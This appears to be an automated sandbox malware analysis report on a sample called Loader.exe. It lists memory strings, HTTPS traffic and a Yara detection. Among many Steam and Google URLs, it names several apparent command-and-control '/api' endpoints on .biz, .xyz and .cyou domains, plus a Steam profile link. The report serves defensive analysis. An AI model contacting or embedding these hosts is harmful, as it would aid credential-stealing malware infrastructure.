Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/
Source: Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/api
Source: Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/api#
Source: Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz:443/api
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://diffuculttan.xyz/
Source: Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://diffuculttan.xyz/api
Source: Loader.exe, 00000000.00000003.1800647255.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800804536.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/
Source: Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/api
Source: Loader.exe, 00000000.00000003.1800647255.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800804536.0000000000671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/h
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: Loader.exe, Loader.exe, 00000000.00000003.1775134722.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/
Source: Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/api
Source: Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/api;
Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/apij
Source: Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/l#
Source: Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/pi
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/api
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/T#
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.0000000000653000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900l
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850362286.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: Loader.exe, 00000000.00000003.1850474497.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850362286.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/
Source: Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/api
Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/api6(8
Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/api=(#
Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/apio
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49733 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

